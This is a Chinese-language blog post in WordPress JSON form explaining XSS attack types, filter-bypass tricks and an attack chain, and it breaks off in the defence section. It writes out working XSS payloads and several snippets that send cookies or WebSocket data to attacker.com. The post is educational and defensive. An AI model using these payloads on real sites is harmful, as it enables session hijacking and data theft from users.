{"id":66258,"date":"2026-01-26T14:17:31","date_gmt":"2026-01-26T06:17:31","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/66258.html"},"modified":"2026-01-26T14:17:31","modified_gmt":"2026-01-26T06:17:31","slug":"web%e5%ae%89%e5%85%a8%e5%bf%85%e7%9f%a5%ef%bd%9cxss%e6%94%bb%e5%87%bb%e8%af%a6%e8%a7%a3%ef%bc%9a%e4%bb%8e%e6%bc%8f%e6%b4%9e%e6%8c%96%e6%8e%98%e5%88%b0%e9%98%b2%e6%8a%a4%e5%ae%9e%e6%88%98%ef%bc%8c","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/66258.html","title":{"rendered":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86"},"content":{"rendered":"<h2>XSS\u653b\u51fb\u8be6\u89e3<\/h2>\n<h3>1. XSS\u653b\u51fb\u6982\u8ff0<\/h3>\n<p>XSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002<\/p>\n<h4>\u5173\u952e\u7279\u5f81&#xff1a;<\/h4>\n<ul>\n<li>\u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d<\/li>\n<li>\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb<\/li>\n<li>\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236<\/li>\n<li>\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Cookie\u3001\u4f1a\u8bdd\u52ab\u6301\u3001\u9493\u9c7c\u653b\u51fb\u7b49<\/li>\n<\/ul>\n<h3>2. XSS\u653b\u51fb\u7c7b\u578b<\/h3>\n<h4>2.1 \u53cd\u5c04\u578bXSS&#xff08;Reflected XSS&#xff09;<\/h4>\n<p>\u7279\u70b9&#xff1a;\u6076\u610f\u811a\u672c\u4f5c\u4e3a\u8bf7\u6c42\u7684\u4e00\u90e8\u5206\u53d1\u9001&#xff0c;\u670d\u52a1\u5668\u7acb\u5373\u5728\u54cd\u5e94\u4e2d\u8fd4\u56de\u5e76\u6267\u884c<\/p>\n<p>\u653b\u51fb\u6d41\u7a0b&#xff1a;<\/p>\n<li>\u653b\u51fb\u8005\u6784\u9020\u5305\u542b\u6076\u610f\u811a\u672c\u7684URL<\/li>\n<li>\u8bf1\u4f7f\u7528\u6237\u70b9\u51fb\u8be5URL<\/li>\n<li>\u670d\u52a1\u5668\u672a\u8fc7\u6ee4\u76f4\u63a5\u5c06\u811a\u672c\u8fd4\u56de<\/li>\n<li>\u7528\u6237\u6d4f\u89c8\u5668\u6267\u884c\u6076\u610f\u811a\u672c<\/li>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p>http:\/\/vulnerable-site.com\/search?q&#061;&lt;script&gt;alert(&#039;XSS&#039;)&lt;\/script&gt;<\/p>\n<h4>2.2 \u5b58\u50a8\u578bXSS&#xff08;Stored XSS \/ Persistent XSS&#xff09;<\/h4>\n<p>\u7279\u70b9&#xff1a;\u6076\u610f\u811a\u672c\u88ab\u6c38\u4e45\u5b58\u50a8\u5728\u76ee\u6807\u670d\u52a1\u5668\u4e0a&#xff08;\u6570\u636e\u5e93\u3001\u6587\u4ef6\u7b49&#xff09;<\/p>\n<p>\u653b\u51fb\u6d41\u7a0b&#xff1a;<\/p>\n<li>\u653b\u51fb\u8005\u5c06\u6076\u610f\u811a\u672c\u63d0\u4ea4\u5230\u7f51\u7ad9&#xff08;\u5982\u8bc4\u8bba\u3001\u8bba\u575b\u5e16\u5b50&#xff09;<\/li>\n<li>\u811a\u672c\u88ab\u5b58\u50a8\u5728\u670d\u52a1\u5668\u6570\u636e\u5e93\u4e2d<\/li>\n<li>\u5176\u4ed6\u7528\u6237\u8bbf\u95ee\u5305\u542b\u8be5\u5185\u5bb9\u7684\u9875\u9762<\/li>\n<li>\u6076\u610f\u811a\u672c\u81ea\u52a8\u52a0\u8f7d\u5e76\u6267\u884c<\/li>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p><span class=\"token comment\">&lt;!&#8211; \u653b\u51fb\u8005\u5728\u8bc4\u8bba\u4e2d\u63d2\u5165 &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>script<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token script\"><span class=\"token language-javascript\"><br \/>\n  <span class=\"token keyword\">var<\/span> img <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">Image<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  img<span class=\"token punctuation\">.<\/span>src <span class=\"token operator\">&#061;<\/span> <span class=\"token string\">&#039;http:\/\/attacker.com\/steal?cookie&#061;&#039;<\/span> <span class=\"token operator\">&#043;<\/span> document<span class=\"token punctuation\">.<\/span>cookie<span class=\"token punctuation\">;<\/span><br \/>\n<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>script<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h4>2.3 DOM\u578bXSS&#xff08;DOM-based XSS&#xff09;<\/h4>\n<p>\u7279\u70b9&#xff1a;\u6f0f\u6d1e\u5b58\u5728\u4e8e\u5ba2\u6237\u7aef\u4ee3\u7801\u4e2d&#xff0c;\u4e0d\u6d89\u53ca\u670d\u52a1\u5668\u54cd\u5e94<\/p>\n<p>\u653b\u51fb\u6d41\u7a0b&#xff1a;<\/p>\n<li>\u653b\u51fb\u8005\u6784\u9020\u7279\u6b8aURL<\/li>\n<li>\u7528\u6237\u8bbf\u95ee\u8be5URL<\/li>\n<li>\u5ba2\u6237\u7aefJavaScript\u8bfb\u53d6URL\u53c2\u6570\u5e76\u52a8\u6001\u66f4\u65b0DOM<\/li>\n<li>\u6076\u610f\u811a\u672c\u88ab\u6267\u884c<\/li>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p><span class=\"token comment\">\/\/ \u6f0f\u6d1e\u4ee3\u7801<\/span><br \/>\n<span class=\"token keyword\">var<\/span> hash <span class=\"token operator\">&#061;<\/span> window<span class=\"token punctuation\">.<\/span>location<span class=\"token punctuation\">.<\/span>hash<span class=\"token punctuation\">.<\/span><span class=\"token function\">substring<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\ndocument<span class=\"token punctuation\">.<\/span><span class=\"token function\">getElementById<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#034;content&#034;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span>innerHTML <span class=\"token operator\">&#061;<\/span> hash<span class=\"token punctuation\">;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u653b\u51fbURL<\/span><br \/>\n<span class=\"token literal-property property\">http<\/span><span class=\"token operator\">:<\/span><span class=\"token operator\">\/<\/span><span class=\"token operator\">\/<\/span>site<span class=\"token punctuation\">.<\/span>com<span class=\"token operator\">\/<\/span>page#<span class=\"token operator\">&lt;<\/span>script<span class=\"token operator\">&gt;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;XSS&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><\/p>\n<h3>3. XSS\u653b\u51fb\u6280\u672f\u7ec6\u8282<\/h3>\n<h4>3.1 \u6ce8\u5165\u70b9<\/h4>\n<ul>\n<li>HTML\u5143\u7d20\u5185\u5bb9&#xff1a;&lt;div&gt;\u7528\u6237\u8f93\u5165&lt;\/div&gt;<\/li>\n<li>HTML\u5c5e\u6027\u503c&#xff1a;&lt;input value&#061;&#034;\u7528\u6237\u8f93\u5165&#034;&gt;<\/li>\n<li>JavaScript\u4ee3\u7801&#xff1a;&lt;script&gt;var x &#061; &#039;\u7528\u6237\u8f93\u5165&#039;;&lt;\/script&gt;<\/li>\n<li>CSS\u6837\u5f0f&#xff1a;&lt;style&gt;\u7528\u6237\u8f93\u5165&lt;\/style&gt;<\/li>\n<li>URL\u53c2\u6570&#xff1a;&lt;a href&#061;&#034;\u7528\u6237\u8f93\u5165&#034;&gt;\u94fe\u63a5&lt;\/a&gt;<\/li>\n<\/ul>\n<h4>3.2 \u7ed5\u8fc7\u8fc7\u6ee4\u7684\u6280\u672f<\/h4>\n<h5>HTML\u5b9e\u4f53\u7f16\u7801\u7ed5\u8fc7<\/h5>\n<p><span class=\"token comment\">\/\/ \u4f7f\u7528HTML\u5b9e\u4f53\u7f16\u7801<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span> \u2192 <span class=\"token operator\">&amp;<\/span>lt<span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token operator\">&gt;<\/span> \u2192 <span class=\"token operator\">&amp;<\/span>gt<span class=\"token punctuation\">;<\/span><br \/>\n&#034; \u2192 <span class=\"token operator\">&amp;<\/span>quot<span class=\"token punctuation\">;<\/span><br \/>\n&#039; \u2192 <span class=\"token operator\">&amp;<\/span>#x27<span class=\"token punctuation\">;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u7ed5\u8fc7\u65b9\u6cd5&#xff1a;\u4f7f\u7528\u672a\u7f16\u7801\u7684\u53d8\u4f53<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>img src<span class=\"token operator\">&#061;<\/span>x onerror<span class=\"token operator\">&#061;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<h5>JavaScript\u7f16\u7801\u7ed5\u8fc7<\/h5>\n<p><span class=\"token comment\">\/\/ \u4f7f\u7528Unicode\u3001\u5341\u516d\u8fdb\u5236\u7f16\u7801<\/span><br \/>\n<span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;XSS&#039;<\/span><span class=\"token punctuation\">)<\/span> \u2192 \\\\u0061\\\\u006c\\\\u0065\\\\u0072\\\\<span class=\"token function\">u0074<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;\\\\u0058\\\\u0053\\\\u0053&#039;<\/span><span class=\"token punctuation\">)<\/span><\/p>\n<h5>\u4e8b\u4ef6\u5904\u7406\u5668\u5229\u7528<\/h5>\n<p><span class=\"token comment\">&lt;!&#8211; \u591a\u79cd\u4e8b\u4ef6\u89e6\u53d1\u65b9\u5f0f &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>body<\/span> <span class=\"token special-attr\"><span class=\"token attr-name\">onload<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token value javascript language-javascript\"><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/span><\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>img<\/span> <span class=\"token attr-name\">src<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span>x<\/span> <span class=\"token special-attr\"><span class=\"token attr-name\">onerror<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token value javascript language-javascript\"><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/span><\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>svg<\/span> <span class=\"token special-attr\"><span class=\"token attr-name\">onload<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token value javascript language-javascript\"><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/span><\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h5>\u4f2a\u534f\u8bae\u5229\u7528<\/h5>\n<p><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>a<\/span> <span class=\"token attr-name\">href<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token punctuation\">&#034;<\/span>javascript:alert(1)<span class=\"token punctuation\">&#034;<\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span>\u70b9\u51fb<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>a<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>iframe<\/span> <span class=\"token attr-name\">src<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token punctuation\">&#034;<\/span>javascript:alert(1)<span class=\"token punctuation\">&#034;<\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h3>4. \u9ad8\u7ea7XSS\u653b\u51fb\u6280\u672f<\/h3>\n<h4>4.1 \u57fa\u4e8eFlash\u7684XSS<\/h4>\n<p>\/\/ Flash\u4e2d\u7684\u6f0f\u6d1e\u5229\u7528<br \/>\ngetURL(&#034;javascript:alert(&#039;XSS&#039;)&#034;);<br \/>\nloadMovie(&#034;javascript:alert(&#039;XSS&#039;)&#034;);<\/p>\n<h4>4.2 mXSS&#xff08;\u7a81\u53d8XSS&#xff09;<\/h4>\n<p>\u539f\u7406&#xff1a;\u6d4f\u89c8\u5668HTML\u89e3\u6790\u5668\u4e0eDOM\u89e3\u6790\u5668\u4e4b\u95f4\u7684\u4e0d\u4e00\u81f4\u6027<\/p>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p><span class=\"token comment\">&lt;!&#8211; \u539f\u59cb\u4ee3\u7801 &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token style\"><span class=\"token language-css\">&lt;img src&#061;x onerror&#061;<span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span>1<span class=\"token punctuation\">)<\/span>&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<p><span class=\"token comment\">&lt;!&#8211; \u89e3\u6790\u540e &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token style\"><span class=\"token language-css\">&lt;img src&#061;<span class=\"token string\">&#034;x&#034;<\/span> onerror&#061;<span class=\"token string\">&#034;alert(1)&#034;<\/span>&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h4>4.3 \u76f2\u6ce8XSS<\/h4>\n<p>\u7279\u70b9&#xff1a;\u653b\u51fb\u8005\u65e0\u6cd5\u76f4\u63a5\u770b\u5230\u6267\u884c\u7ed3\u679c&#xff0c;\u9700\u8981\u901a\u8fc7\u5916\u90e8\u901a\u4fe1\u786e\u8ba4<\/p>\n<p>\u5229\u7528\u65b9\u5f0f&#xff1a;<\/p>\n<p><span class=\"token comment\">\/\/ \u53d1\u9001\u8bf7\u6c42\u5230\u653b\u51fb\u8005\u63a7\u5236\u7684\u670d\u52a1\u5668<\/span><br \/>\n<span class=\"token keyword\">var<\/span> xhr <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">XMLHttpRequest<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\nxhr<span class=\"token punctuation\">.<\/span><span class=\"token function\">open<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;GET&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string\">&#039;http:\/\/attacker.com\/log?data&#061;&#039;<\/span> <span class=\"token operator\">&#043;<\/span> document<span class=\"token punctuation\">.<\/span>cookie<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\nxhr<span class=\"token punctuation\">.<\/span><span class=\"token function\">send<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h3>5. XSS\u653b\u51fb\u94fe\u5206\u6790<\/h3>\n<h4>5.1 \u4fe1\u606f\u6536\u96c6\u9636\u6bb5<\/h4>\n<p><span class=\"token comment\">\/\/ \u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/span><br \/>\n<span class=\"token comment\">\/\/ Cookie\u7a83\u53d6<\/span><br \/>\ndocument<span class=\"token punctuation\">.<\/span>cookie<\/p>\n<p><span class=\"token comment\">\/\/ \u672c\u5730\u5b58\u50a8<\/span><br \/>\nlocalStorage<span class=\"token punctuation\">.<\/span><span class=\"token function\">getItem<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;token&#039;<\/span><span class=\"token punctuation\">)<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u5c4f\u5e55\u622a\u56fe&#xff08;\u9700\u914d\u5408\u5176\u4ed6\u6f0f\u6d1e&#xff09;<\/span><br \/>\n<span class=\"token comment\">\/\/ \u8868\u5355\u6570\u636e\u6355\u83b7<\/span><br \/>\ndocument<span class=\"token punctuation\">.<\/span>forms<span class=\"token punctuation\">[<\/span><span class=\"token number\">0<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">addEventListener<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;submit&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">e<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token keyword\">var<\/span> data <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">FormData<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">this<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u53d1\u9001\u5230\u653b\u51fb\u8005\u670d\u52a1\u5668<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h4>5.2 \u6301\u4e45\u5316\u6280\u672f<\/h4>\n<p><span class=\"token comment\">\/\/ \u81ea\u6211\u590d\u5236\u5230\u5176\u4ed6\u4f4d\u7f6e<\/span><br \/>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span><span class=\"token operator\">!<\/span>window<span class=\"token punctuation\">.<\/span><span class=\"token function\">hasOwnProperty<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;xss_payload&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  window<span class=\"token punctuation\">.<\/span>xss_payload <span class=\"token operator\">&#061;<\/span> <span class=\"token boolean\">true<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u6ce8\u5165\u5230\u5176\u4ed6\u53ef\u7f16\u8f91\u533a\u57df<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u4fee\u6539\u73b0\u6709\u811a\u672c<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u521b\u5efa\u9690\u85cfiframe<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h4>5.3 \u6a2a\u5411\u79fb\u52a8<\/h4>\n<p><span class=\"token comment\">\/\/ \u81ea\u52a8\u53d1\u9001\u6076\u610f\u6d88\u606f<\/span><br \/>\n<span class=\"token keyword\">function<\/span> <span class=\"token function\">spreadXSS<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u67e5\u627e\u597d\u53cb\u5217\u8868<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u81ea\u52a8\u53d1\u9001\u5305\u542bXSS\u7684\u6d88\u606f<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u5229\u7528CSRF\u8fdb\u884c\u4f20\u64ad<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h3>6. \u73b0\u4ee3XSS\u653b\u51fb\u5411\u91cf<\/h3>\n<h4>6.1 \u57fa\u4e8eWebSocket\u7684XSS<\/h4>\n<p><span class=\"token comment\">\/\/ WebSocket\u8fde\u63a5\u7a83\u53d6<\/span><br \/>\n<span class=\"token keyword\">var<\/span> ws <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">WebSocket<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;ws:\/\/vulnerable-site.com\/chat&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\nws<span class=\"token punctuation\">.<\/span><span class=\"token function-variable function\">onmessage<\/span> <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">event<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u5c06\u6d88\u606f\u8f6c\u53d1\u5230\u653b\u51fb\u8005\u670d\u52a1\u5668<\/span><br \/>\n  <span class=\"token function\">fetch<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;http:\/\/attacker.com\/log&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token literal-property property\">method<\/span><span class=\"token operator\">:<\/span> <span class=\"token string\">&#039;POST&#039;<\/span><span class=\"token punctuation\">,<\/span><br \/>\n    <span class=\"token literal-property property\">body<\/span><span class=\"token operator\">:<\/span> event<span class=\"token punctuation\">.<\/span>data<br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h4>6.2 Service Worker\u52ab\u6301<\/h4>\n<p><span class=\"token comment\">\/\/ \u6ce8\u518c\u6076\u610fService Worker<\/span><br \/>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;serviceWorker&#039;<\/span> <span class=\"token keyword\">in<\/span> navigator<span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  navigator<span class=\"token punctuation\">.<\/span>serviceWorker<span class=\"token punctuation\">.<\/span><span class=\"token function\">register<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;malicious-sw.js&#039;<\/span><span class=\"token punctuation\">)<\/span><br \/>\n    <span class=\"token punctuation\">.<\/span><span class=\"token function\">then<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">registration<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n      console<span class=\"token punctuation\">.<\/span><span class=\"token function\">log<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;Service Worker\u6ce8\u518c\u6210\u529f&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n    <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h4>6.3 \u57fa\u4e8eWebRTC\u7684XSS<\/h4>\n<p><span class=\"token comment\">\/\/ \u901a\u8fc7WebRTC\u6cc4\u9732\u5185\u90e8IP<\/span><br \/>\n<span class=\"token keyword\">var<\/span> pc <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">RTCPeerConnection<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\npc<span class=\"token punctuation\">.<\/span><span class=\"token function\">createOffer<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">then<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">offer<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u89e3\u6790SDP\u83b7\u53d6\u5185\u90e8IP<\/span><br \/>\n  <span class=\"token keyword\">var<\/span> internalIP <span class=\"token operator\">&#061;<\/span> <span class=\"token regex\"><span class=\"token regex-delimiter\">\/<\/span><span class=\"token regex-source language-regex\">([0-9]{1,3}(\\\\.[0-9]{1,3}){3})<\/span><span class=\"token regex-delimiter\">\/<\/span><\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">exec<\/span><span class=\"token punctuation\">(<\/span>offer<span class=\"token punctuation\">.<\/span>sdp<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">[<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  <span class=\"token function\">exfiltrate<\/span><span class=\"token punctuation\">(<\/span>internalIP<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h3>7. \u9632\u5fa1\u63aa\u65bd<\/h3>\n<h4>7.1 \u8f93\u5165\u9a8c\u8bc1\u4e0e\u8fc7\u6ee4<\/h4>\n<p><span class=\"token comment\">\/\/ \u767d\u540d\u5355\u8fc7\u6ee4\u793a\u4f8b<\/span><br \/>\n<span class=\"token keyword\">function<\/span> <span class=\"token function\">sanitizeHTML<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">str<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token keyword\">const<\/span> allowedTags <span class=\"token operator\">&#061;<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token string-property property\">&#039;b&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;i&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;u&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;em&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;strong&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<p>  <span class=\"token comment\">\/\/ \u4f7f\u7528DOMPurify\u7b49\u5e93<\/span><br \/>\n  <span class=\"token keyword\">return<\/span> 